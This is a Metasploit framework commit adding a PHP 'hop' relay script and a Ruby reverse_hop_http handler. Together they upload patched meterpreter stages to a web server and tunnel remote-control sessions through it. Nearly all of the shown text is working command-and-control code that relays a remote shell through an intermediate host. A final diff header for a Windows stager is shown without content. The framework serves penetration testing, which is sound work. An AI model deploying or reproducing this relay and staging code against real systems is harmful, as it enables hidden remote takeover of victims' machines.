Merge rapid7#2809 into master

HD Moore · HD Moore · commit 5961861c9775 · 2014-07-06T23:46:10.000-05:00
diff --git a/data/php/hop.php b/data/php/hop.php
@@ -0,0 +1,68 @@
+<?php
+$magic = 'TzGq';
+$tempdir = sys_get_temp_dir() . "/hop" . $magic;
+if(!is_dir($tempdir)){
+	mkdir($tempdir); //make sure it's there
+}
+
+//get url
+$url = $_SERVER["QUERY_STRING"];
+//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
+
+//Looks for a file with a name or contents prefix, if found, send it and deletes it
+function findSendDelete($tempdir, $prefix, $one=true){
+	if($dh = opendir($tempdir)){
+		while(($file = readdir($dh)) !== false){
+			if(strpos($file, $prefix) !== 0){
+				continue;
+			}
+			readfile($tempdir."/".$file);
+			unlink($tempdir."/".$file);
+			if($one){
+				break;
+			}
+		}
+	}
+}
+
+//handle control
+if($url === "/control"){
+	if($_SERVER['REQUEST_METHOD'] === 'POST'){
+		//handle data for payload - save in a "down" file or the "init" file
+		$postdata = file_get_contents("php://input");
+		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
+			$f = fopen($tempdir."/init", "w"); //only one init file
+		}else{
+			$prefix = "down_" . bin2hex($_SERVER['HTTP_X_URLFRAG']);
+			$f = fopen(tempnam($tempdir,$prefix), "w");
+		}
+		fwrite($f, $postdata);
+		fclose($f);
+	}else{
+		findSendDelete($tempdir, "up_", false);
+	}
+}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
+	//get data
+	$postdata = file_get_contents("php://input");
+	//See if we should send anything down
+	if($postdata === 'RECV'){
+		findSendDelete($tempdir, "down_" . bin2hex($url));
+		$fname = $tempdir . "/up_recv_" . bin2hex($url); //Only keep one RECV poll
+	}else{
+		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
+	}
+	//find free and write new file
+	$f = fopen($fname, "w");
+	fwrite($f, $magic);
+	//Little-endian pack length and data
+	$urlen = strlen($url);
+	fwrite($f, pack('V', $urlen));
+	fwrite($f, $url);
+	$postdatalen = strlen($postdata);
+	fwrite($f, pack('V', $postdatalen));
+	fwrite($f, $postdata);
+	fclose($f);
+//Initial query will be a GET and have a 12345 in it
+}else if(strpos($url, "12345") !== FALSE){
+	readfile($tempdir."/init");
+}
diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb
@@ -0,0 +1,305 @@
+# -*- coding: binary -*-
+require 'rex/io/stream_abstraction'
+require 'rex/sync/ref'
+require 'msf/core/handler/reverse_http'
+require 'uri'
+
+module Msf
+module Handler
+
+###
+#
+# This handler implements the HTTP hop tunneling interface.
+# It acts like an HTTP server to the meterpreter packet dispatcher but
+# as an HTTP client to actually send and receive the data from the hop.
+#
+###
+module ReverseHopHttp
+
+  include Msf::Handler::ReverseHttp
+
+  #
+  # Magic bytes to know we are talking to a valid hop
+  #
+  MAGIC = 'TzGq'
+
+  # hop_handlers is  a class-level instance variable
+  class << self; attr_accessor :hop_handlers end
+  attr_accessor :monitor_thread # :nodoc:
+  attr_accessor :handlers # :nodoc:
+  attr_accessor :closed_handlers # :nodoc:
+  attr_accessor :mclient # :nodoc:
+  attr_accessor :current_url # :nodoc:
+  attr_accessor :control # :nodoc:
+  attr_accessor :refs # :nodoc:
+  attr_accessor :lock # :nodoc:
+
+  #
+  # Keeps track of what hops have active handlers
+  #
+  @hop_handlers = {}
+
+  #
+  # Returns the string representation of the handler type
+  #
+  def self.handler_type
+    return "reverse_hop_http"
+  end
+
+  #
+  # Returns the connection-described general handler type, in this case
+  # 'tunnel'.
+  #
+  def self.general_handler_type
+    "tunnel"
+  end
+
+  #
+  # Sets up a handler. Doesn't do much since it's all in start_handler.
+  #
+  def setup_handler
+    self.handlers = {}
+    self.closed_handlers = {}
+    self.lock = Mutex.new
+  end
+
+  #
+  # Starts the handler along with a monitoring thread to handle data transfer
+  #
+  def start_handler
+    # Our HTTP client and URL for talking to the hop
+    uri = URI(full_uri)
+    self.control = "#{uri.request_uri}control"
+    self.mclient = Rex::Proto::Http::Client.new(
+      uri.host,
+      uri.port,
+      {
+        'Msf'        => framework
+      }
+    )
+    @running = true # So we know we can stop it
+    # If someone is already monitoring this hop, bump the refcount instead of starting a new thread
+    if ReverseHopHttp.hop_handlers.has_key?(full_uri)
+      ReverseHopHttp.hop_handlers[full_uri].refs += 1
+      return
+    end
+
+    # Sometimes you just have to do everything yourself. 
+    # Declare ownership of this hop and spawn a thread to monitor it.
+    self.refs = 1
+    ReverseHopHttp.hop_handlers[full_uri] = self
+    self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri,
+        self) do |uri, hop_http|
+      hop_http.send_new_stage # send stage to hop
+      delay = 1 # poll delay
+      # Continue to loop as long as at least one handler or one session is depending on us
+      until hop_http.refs < 1 && hop_http.handlers.empty?
+        sleep delay
+        delay = delay + 1 if delay < 10 # slow down if we're not getting anything
+        crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control})
+        res = hop_http.mclient.send_recv(crequest) # send poll to the hop
+        next if res.nil?
+        if res.error
+          print_error(res.error)
+          next
+        end
+
+        # validate responses, handle each message down
+        received = res.body
+        until received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC
+
+          # good response
+          delay = 0 # we're talking, speed up
+          urlen = received.slice!(0,4).unpack('V')[0]
+          urlpath = received.slice!(0,urlen)
+          datalen = received.slice!(0,4).unpack('V')[0]
+
+          # do not want handlers to change while we dispatch this
+          hop_http.lock.lock
+          #received now starts with the binary contents of the message
+          if hop_http.handlers.include? urlpath
+            pack = Rex::Proto::Http::Packet.new
+            pack.body = received.slice!(0,datalen)
+            hop_http.current_url = urlpath
+            hop_http.handlers[urlpath].call(hop_http, pack)
+            hop_http.lock.unlock
+          elsif !closed_handlers.include? urlpath
+            hop_http.lock.unlock
+            #New session!
+            conn_id = urlpath.gsub("/","")
+            # Short-circuit the payload's handle_connection processing for create_session
+            # We are the dispatcher since we need to handle the comms to the hop
+            create_session(hop_http, {
+              :passive_dispatcher => self,
+              :conn_id            => conn_id,
+              :url                => uri.to_s + conn_id + "/\x00",
+              :expiration         => datastore['SessionExpirationTimeout'].to_i,
+              :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
+              :ssl                => false,
+            })
+            # send new stage to hop so next inbound session will get a unique ID.
+            hop_http.send_new_stage
+          else
+            hop_http.lock.unlock
+          end
+        end
+      end
+      hop_http.monitor_thread = nil #make sure we're out
+      ReverseHopHttp.hop_handlers.delete(full_uri)
+    end
+  end
+
+  #
+  # Stops the handler and monitoring thread
+  #
+  def stop_handler
+    # stop_handler is called like 3 times, don't decrement refcount unless we're still running
+    if @running
+      ReverseHopHttp.hop_handlers[full_uri].refs -= 1
+      @running = false
+    end
+  end
+
+  #
+  # Adds a resource. (handler for a session)
+  #
+  def add_resource(res, opts={})
+    self.handlers[res] = opts['Proc']
+    start_handler if monitor_thread.nil?
+  end
+
+  #
+  # Removes a resource.
+  #
+  def remove_resource(res)
+    lock.lock
+    handlers.delete(res)
+    closed_handlers[res] = true
+    lock.unlock
+  end
+
+  #
+  # Implemented for compatibility reasons, does nothing
+  #
+  def close_client(cli)
+  end
+
+  #
+  # Sends data to hop
+  #
+  def send_response(resp)
+    if not resp.body.empty?
+      crequest = mclient.request_raw(
+          'method' => 'POST',
+          'uri' => control,
+          'data' => resp.body,
+          'headers' => {'X-urlfrag' => current_url}
+      )
+      # if receiving POST data, hop does not send back data, so we can stop here
+      mclient.send_recv(crequest)
+    end
+  end
+
+  #
+  # Return the URI of the hop point.
+  #
+  def full_uri
+    uri = datastore['HOPURL']
+    return uri if uri.end_with?('/')
+    return "#{uri}/" if uri.end_with?('?')
+    "#{uri}?/"
+  end
+
+  #
+  # Returns a string representation of the local hop
+  #
+  def localinfo
+    "Hop client"
+  end
+
+  #
+  # Returns the URL of the remote hop end
+  #
+  def peerinfo
+    uri = URI(full_uri)
+    "#{uri.host}:#{uri.port}"
+  end
+
+  #
+  # Initializes the Hop HTTP tunneling handler.
+  #
+  def initialize(info = {})
+    super
+
+    register_options(
+      [
+        OptString.new('HOPURL', [ true, "The full URL of the hop script, e.g. http://a.b/hop.php" ])
+      ], Msf::Handler::ReverseHopHttp)
+
+  end
+
+  #
+  # Generates and sends a stage up to the hop point to be ready for the next client
+  #
+  def send_new_stage
+    conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
+    url = full_uri + conn_id + "/\x00"
+
+    print_status("Preparing stage for next session #{conn_id}")
+    blob = stage_payload
+
+    # Replace the user agent string with our option
+    i = blob.index("METERPRETER_UA\x00")
+    if i
+      str = datastore['MeterpreterUserAgent'][0,255] + "\x00"
+      blob[i, str.length] = str
+    end
+
+    # Replace the transport string first (TRANSPORT_SOCKET_SSL)
+    i = blob.index("METERPRETER_TRANSPORT_SSL")
+    if i
+      str = "METERPRETER_TRANSPORT_HTTP#{ssl? ? "S" : ""}\x00"
+      blob[i, str.length] = str
+    end
+
+    conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
+    i = blob.index("https://" + ("X" * 256))
+    if i
+      url = full_uri + conn_id + "/\x00"
+      blob[i, url.length] = url
+    end
+    print_status("Patched URL at offset #{i}...")
+
+    i = blob.index([0xb64be661].pack("V"))
+    if i
+      str = [ datastore['SessionExpirationTimeout'] ].pack("V")
+      blob[i, str.length] = str
+    end
+
+    i = blob.index([0xaf79257f].pack("V"))
+    if i
+      str = [ datastore['SessionCommunicationTimeout'] ].pack("V")
+      blob[i, str.length] = str
+    end
+
+    blob = encode_stage(blob)
+
+    #send up
+    crequest = mclient.request_raw(
+        'method' => 'POST',
+        'uri' => control,
+        'data' => blob,
+        'headers' => {'X-init' => 'true'}
+    )
+    res = mclient.send_recv(crequest)
+    print_status("Uploaded stage to hop #{full_uri}")
+    print_error(res.error) if !res.nil? && res.error
+
+    #return conn info
+    [conn_id, url]
+  end
+
+end
+
+end
+end
diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb
